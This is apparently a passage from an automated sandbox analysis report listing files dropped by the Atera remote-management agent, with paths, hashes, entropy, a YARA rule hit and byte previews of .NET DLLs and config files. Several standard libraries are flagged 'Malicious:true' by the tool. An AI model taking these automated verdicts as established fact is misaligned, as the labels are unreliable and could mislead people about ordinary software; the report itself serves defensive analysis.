                                                                                                                                                                                                                                                                                              SHA-512:8E7DA62E9D0E288DC9EFC9559A2640A0C05435D6A25F8023857256A4B4C9AED55593220A930ACB6D171E01D968F1B2CD9748191DE7E242707E1704D140980B03
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..F..........:d... ........... ...............................I....`..................................c..O....................T..((.......... c..T............................................ ............... ..H............text....D... ...F.................. ..`.rsrc................H..............@..@.reloc...............R..............@..B.................d......H........%...2...........W.......b......................................"..(....*..(....*"..(....*..(....*..(....*..(....*.(....*"..(....*...0..B.......~..........(b...~....,.~.....oc......+...(......od......,..(e....*........../7......"..(....*6.(.....(....*..0..........(.......of...&.*.(....og...*2(.....oc...*....0..?.......~..........(b...~....,.~.....oc...+...(.....oh...&...,..(e....*.........,4.......0..?.......~..........(b...~....,.~....oi......+...(....oj......,..(e..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):710184
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.960272795417215
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:IBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUc:IBA/ZTvQD0XY0AJBSjRlXP36RMGB
                                                                                                                                                                                                                                                                                              MD5:154279B228E454EF4F2C00E6641C4156
                                                                                                                                                                                                                                                                                              SHA1:7ADC7DA40FAF7F84E5F7EFC1CEA2B1A782B6444F
                                                                                                                                                                                                                                                                                              SHA-256:24FA79B003DC41A0C8BB5B093C84767747BF92679559B329A5F97CB1BFB7E9ED
                                                                                                                                                                                                                                                                                              SHA-512:9D521972D56F47824D35E47BEB3A1AF8961CFD55E1C4CE07053BAC373CF80A980C5415D0E5CEAEBF71EBBBC087D76E633286094516CDD4B2F987CEAE00DB37D2
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... .......'....`.....................................O.......................((.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Polly.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):285736
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.184607903346133
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:vZAWDkTmokB1QI3A5XeedC1OcQykFlE1WhOMiSdNrgClZ73HpsP+zvz:vZU0BJwuOcrl1w7HX3HW2
                                                                                                                                                                                                                                                                                              MD5:57A1AEE6DE2FA4131930B08624B644D8
                                                                                                                                                                                                                                                                                              SHA1:8823A7D95F04C5E09F00858EEC8E79FBDF19FFD8
                                                                                                                                                                                                                                                                                              SHA-256:C4146ACBDFAF502E9D48817D75C3E55C34DD2FD809B1256C25E151F431D09650
                                                                                                                                                                                                                                                                                              SHA-512:476E308A37B7EE55380B5C70A1CF5E4F9269E5D29C2987CE2B67060069D256E2797DB21185F1A1688284EF455764278E9C27CB11CDBB9A6AAB4A81822EDA05C9
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&............" ..0..*..........&H... ...`....... ...............................<....`..................................G..O....`..L............4..((...........G..T............................................ ............... ..H............text...,(... ...*.................. ..`.rsrc...L....`.......,..............@..@.reloc...............2..............@..B.................H......H....... d..t....................F......................................^.{....,.(F...z..}.....*^.{....,.(F...z..}.....*"..(K...*"..(L...*...0..,.......s.......}............s9...sv....{.....(....*.0..-.......s.......}............s9....s.....{.....(....*....0..(.......s.......}............s9.....{.....(....*.0..'.......s.......}............s9...sv.....(....*B...s......(....*......(....*.0..'.......s.......}............s9...sv.....(....*F...s.......(....*....0..X.........(:...}

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminder.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):25640
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.561297207852954
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:yAQk7qYbA6fXDpLk5LHAxOEaGxBtNXNyb8E9VF6IYijSJIVxsfJH:R1LOg3BtNbEpYi602H
                                                                                                                                                                                                                                                                                              MD5:972828A8463F21F9D3C52893BEA77D25
                                                                                                                                                                                                                                                                                              SHA1:135C36153186F2BE11B7EE4F7122310000B3EB71
                                                                                                                                                                                                                                                                                              SHA-256:7D39C2DA637722ECB4D54846B0378D7BCFF82378A5C3FE1C699977AF7F8E368D
                                                                                                                                                                                                                                                                                              SHA-512:B99D577447B031F45BD876B1A26E4B72503359EC743FE4A9A28CF2014E24D3AFE542F7FA961D22B184E5758AFE66A17A7ED1FF738FB8F24A4283DA5C2C2F72D1
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminder.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..............."...0..2...........Q... ...`....@.. ....................................`..................................Q..O....`...............<..((...........P..8............................................ ............... ..H............text....1... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............:..............@..B.................Q......H........*.. &...........................................................0..:.......~....s....(.....(.~....r...p.o....r...p.o....(....o......*.............(......(....*.s.........*.0...........(.....(....o....r...p(....}......}.....s....}......{....s....}......{....s....}......{....s....}.....s....}.....(...+.~....%-.&~..........s....%............s....(.....{....s ...}......{....s!...}......{.....{....s....}....*.0...........(....,..(....*.{.... ....rU..pr...p.o"...u(.....(#.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminder.exe.config

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2029
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.997010915207503
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:3Aruz7h+1/gF27RgdSagFsg+w3jdgDSg+CagFt:wruv4Mw9y
                                                                                                                                                                                                                                                                                              MD5:A1DB8C019769BA7256F40E580304C782
                                                                                                                                                                                                                                                                                              SHA1:6C0D70EE9CEBFC288A88B100F59D5554F8C42A35
                                                                                                                                                                                                                                                                                              SHA-256:FC68DEF71CD783C53B3D106317F879E544E3443A55AF195BDD6C663F8051A96F
                                                                                                                                                                                                                                                                                              SHA-512:795C141D06E70CD0D91ACFFE74F519EDB78382588B10927D456D20AA70D10BADCF02A626B8B666B00B21CAFCD555F03029D16EFAABCF1D762D58AA8095B6527D
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup> .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.22.0.997" newVersion="2.22.0.997" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependent

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminderNotification.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):210984
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.348173320507078
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:rsMNkrE4AOS3ncIzkq2ijc3Y28MNwH5Z54a7v:wMNkrE4AOqcIzQijLt
                                                                                                                                                                                                                                                                                              MD5:9098FDEBF06AD4F86DBC6567B8F0E889
                                                                                                                                                                                                                                                                                              SHA1:6B38B07BDB90F452591D4679BFE5CC436E048E48
                                                                                                                                                                                                                                                                                              SHA-256:D85301799C1080DD41E88CB37FC4D27465E2AD888ED527EB28BB2A2A2EB8E03D
                                                                                                                                                                                                                                                                                              SHA-512:E7F54A26E75FF693C2484B78571BFB95F95E6802BB37E4AAB622C4CA095C247A9A729AB025784078C29ECA58C23FDD01D9BDF0DA166A096B11D0E6CD7DB4CC7C
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z............"...0..............;... ...@....@.. .......................`.......p....`..................................;..O....@..@...............((...@.......:..8............................................ ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......@......................@..B.................;......H.......H$...............................................................0..;.......~....s.....(.....(.~....r...p.o....r...p.o....(....o......*............(......(....*.s.........*.0..x........(......}.....(.....s....}.....s....}....(...+.~....%-.&~..........s....%............s....(.....{....s.......s....}....*.0..5.......(....--(....o......(.......(....+. ....( ....{....,.*....0..I.........i....*..{.......o!.....{.....o...+.. ..{....r!..p.o....(#...o.......*.*............'..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminderNotification.exe.config

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):19433
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.9963400212242055
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:hrg4CdkumUwfGReGWeGFuGgeKCUDuTeHOTu0U5e3eTOaUmS0SXStuKhubUfSJeZY:hrPOPUDCTHffIz
                                                                                                                                                                                                                                                                                              MD5:78AE9CC6C7B11BAC2B18E82FC7623CDB
                                                                                                                                                                                                                                                                                              SHA1:8314E6F35448B820C7C703FC3E4DE598D2A51AEC
                                                                                                                                                                                                                                                                                              SHA-256:D3841AA3440CDA26776DDE128157294E69A70B21344D5877D640C457353C2DCB
                                                                                                                                                                                                                                                                                              SHA-512:CE6A750E75090487C47095B80D47F5AD0C3D3DE4D6EC58A01E14CC694600FEF951AE371DD2A1B82C756ADD66825611B13240DDD3AAE6339ED85DBD3392DED7E5
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.6.1" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.22.0.997" newVersion="2.22.0.997" />.. </dependentAssembly>.. </assemblyBinding>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="System.Numerics.Vectors" pub

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\StructureMap.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):284200
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.116902682924283
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:3ZgOtIGgeCEwNN4uaNZLVJ8ViVvW18KHxmeWntxX4xH+:pgo0WPVTXge
                                                                                                                                                                                                                                                                                              MD5:988C9D7CB794FB98A0F00B1CAC123D30
                                                                                                                                                                                                                                                                                              SHA1:731A6D91362D0B4245FDD328B17E6F505E48EF80
                                                                                                                                                                                                                                                                                              SHA-256:1F3ED7348B7C41CFFDB9A062C9B654931ED590C77EB4836BCD77A7C64B0AC39E
                                                                                                                                                                                                                                                                                              SHA-512:AF6DE7DC4C78C8C2055BDC99FE9C650E5C44470F0913C3B8D495B7846F63BAD0328918E73C04A542DE4E67C800FCD83925F11C3D174C8C8E1F07D27497AA95E3
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7..........." ..0..$...........C... ...`....... ...............................0....`..................................B..O....`..D...............((...........A..T............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...D....`.......&..............@..@.reloc...............,..............@..B.................B......H.......X~..x.............................................................o...+*..o...+*..(....*n.-..r...p.r...p(<...s=...z*...(.....o>...-.r...p.r)..p(<....s?...z*.0..9..........o@......+$..........(A....oB...(...+,...+...X....i2..*..(D...*....0..n.......sE.....oF......+A.......(...+,/..oG....,.rc..p..oH....oI...(J...sK...z...oL.....X....i2..oM............oN....*..(D...*...0..E........oO....+..oP......oQ......8...,......o....-....,..o.........8.....*.*...........'.......V.-.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.AppContext.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.8059658320981615
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:WDNxWQFWsoNyb8E9VF6IYijSJIVx5+ssR:WDNVLAEpYi602R
                                                                                                                                                                                                                                                                                              MD5:C2064A5B14C1F424718709B04DAF0FB0
                                                                                                                                                                                                                                                                                              SHA1:326FD58B738A32D9DCA68012F5A6DC1750239365
                                                                                                                                                                                                                                                                                              SHA-256:A14785B5EB132463A789C8F8BAFC61743A8E7455EDCFC2D4575DA21E418D60E4
                                                                                                                                                                                                                                                                                              SHA-512:4BD4E5C38F542AE41E4FE2A0FAEA69D8B37096BC523911D2263BE861CBE4A64B9EDE87DD8B3D17DD6B25A57A05038C241171784DD63EF4EA1495B1FBF17B3ECE
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0.............f(... ...@....... ..............................(.....@..................................(..O....@..................((...`.......&............................................... ............... ..H............text...l.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................H(......H.......P ......................\&......................................BSJB............v4.0.30319......l...|...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.....K.N...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Buffers.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):22056
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.6706281590582215
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:vrMdp9yXOfPfAxR5zwWvYW8aznNyb8E9VF6IYijSJIVxAyiI:vrMcXP64LEpYi608I
                                                                                                                                                                                                                                                                                              MD5:9FC668EE53969623508CCF6611FD57F4
                                                                                                                                                                                                                                                                                              SHA1:81F19A067020D8B9CC0F9FEBCBC50D94B9630C88
                                                                                                                                                                                                                                                                                              SHA-256:E9880A6D15335C034660442B04F89ED53E1BCF0188B059DEC110A4152F4EF413
                                                                                                                                                                                                                                                                                              SHA-512:41E3C071BED8B32444EE2D55513E91839A6076E2CFE534033290DFBD4E0442CBD985EEB7B15ED4400DA4686514EF45C2B8FC39E690DD3B79D44F1BED24B0AD2A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..$..........BC... ...`....... ..............................U.....@..................................B..O....`..@...............((...........A............................................... ............... ..H............text...H#... ...$.................. ..`.rsrc...@....`.......&..............@..@.reloc...............,..............@..B................$C......H........'...............?..X...8A......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*.~....*2r...p.(....*B.....(.........*R.....(...+%-.&(!...*^.....("....(...+&~....*.s$...*"..s%...*..(&...*.*....0......................

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.Concurrent.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.907673358776868
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:vm2igOWnW8rW/tNyb8E9VF6IYijSJIVxPT89xNgl:XtaJEpYi60w9I
                                                                                                                                                                                                                                                                                              MD5:B1530AF38169AB17993803DCBBC97C15
                                                                                                                                                                                                                                                                                              SHA1:0C4D4B813EB48CAF441C0987583D8E2B4A8E6FC2
                                                                                                                                                                                                                                                                                              SHA-256:79F518D394DCB75B424F364C2DBCB7E114B51DA4C0DE8BAA6CC5559FF781A152
                                                                                                                                                                                                                                                                                              SHA-512:F8A9E3C2BC50CABA0E7BFB2AC747D8DBBAB7A82E361C85212148048E5FD66C4107323943E753090BFDDF7267A7B53390DD61FF954868CA664EB6933F5D7B41E7
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0..............)... ...@....... ..............................m.....@.................................t)..O....@..D...............((...`......<(............................................... ............... ..H............text........ ...................... ..`.rsrc...D....@......................@..@.reloc.......`......................@..B.................)......H.......P ..l....................'......................................BSJB............v4.0.30319......l.......#~..d.......#Strings....@.......#US.D.......#GUID...T.......#Blob......................3................................................n.o.....o.....\...........8...3.8...P.8.....8.....8.....8.....8.....8.....1.....8.................V.....V.....V...).V...1.V...9.V...A.V...I.V...Q.V...Y.V...a.V...i.V...q.V.......................#.....+.....3.....;.....C.:...K.Z...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.NonGeneric.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.8985842585077926
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:nnapn1iwwPWcGWT5JNyb8E9VF6IYijSJIVxagmKEFYm:aDur5NEpYi600T3
                                                                                                                                                                                                                                                                                              MD5:0763A802D1B4B276635E612F35E23FE8
                                                                                                                                                                                                                                                                                              SHA1:3C256531D21E35595E3699DBFFD9C9C50CC9098A
                                                                                                                                                                                                                                                                                              SHA-256:C17C283DE1A8ED8FA5438DCB8126EB91511E2C49D0706DA50813E23466679DF8
                                                                                                                                                                                                                                                                                              SHA-512:87666AE8FDC33F07C696B0C0057347376E5EC47AEE0F7FC5EC0070F5846194E9BCC1BF624872C11C4ECFC9F2F7A10E5CD3EFC9591948D5DC41CA43AC5DAFEB16
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ....................................@.................................p)..O....@..@...............((...`......8(............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................)......H.......P ..h....................'......................................BSJB............v4.0.30319......l.......#~..t.......#Strings....<.......#US.@.......#GUID...P.......#Blob......................3................................................F.o.....o.....\...........,.....,...(.,.....,...f.,.....,.....,.....,.....%.....,.................V.....V.....V...).V...1.V...9.V...A.V...I.V...Q.V...Y.V...a.V...i.V...q.V.......................#.....+.....3.....;.....C.:...K.Z...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.Specialized.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.905536792862369
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:qHLaEav5aaUa6arWVLWrMNyb8E9VF6IYijSJIVxg3gDHvA:bPv5t/NOOMEpYi608cPA
                                                                                                                                                                                                                                                                                              MD5:847AC54FBB84C86BB024795BAE96C693
                                                                                                                                                                                                                                                                                              SHA1:D2124E516D2D01B3B840800A15B2B6E2F2DA972B
                                                                                                                                                                                                                                                                                              SHA-256:4B45720B96ECCD3B3F812ED05E4835A5EAFC3FBFD6505D0E7098864F8B4E44BB
                                                                                                                                                                                                                                                                                              SHA-512:A22494D45CABBC91C732D35EA3CFCAB7207AA62F2FDD872E5BEF252F0CE67E1D9524747E420BB09A10262607F305C734F89D7806839D99D1048367323C54F715
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0..............)... ...@....... ..............................c.....@..................................)..O....@..P...............((...`......P(............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l.......#~..........#Strings....T.......#US.X.......#GUID...h.......#Blob......................3..................................................`.....`...t.M.................................=.....V.................q.....Z...................G.....G.....G...).G...1.G...9.G...A.G...I.G...Q.G...Y.G...a.G...i.G...q.G.......................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15912
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.75992303278916
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:06iIJq56dOuWSKeWukNyb8E9VF6IYijSJIVxHDRxQxd:GiAuEEpYi609mH
                                                                                                                                                                                                                                                                                              MD5:435008FCDC6949D74403F8937A9DDED0
                                                                                                                                                                                                                                                                                              SHA1:4E9C38420DB7C87C58AEC9271E8A0A968F47AA96
                                                                                                                                                                                                                                                                                              SHA-256:A4A1EA474185E9D56EFCAB64E6A34FFD563CC028A91BB1FE85BFD97773F1FC92
                                                                                                                                                                                                                                                                                              SHA-512:81A7D83D7484BB1B38F9B2164AD42D0D31346626653F9503977942C43F49C7F43227718B50A552AB8D26FA410D08EC8E034B4F71466916B51BC14F1743B38379
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
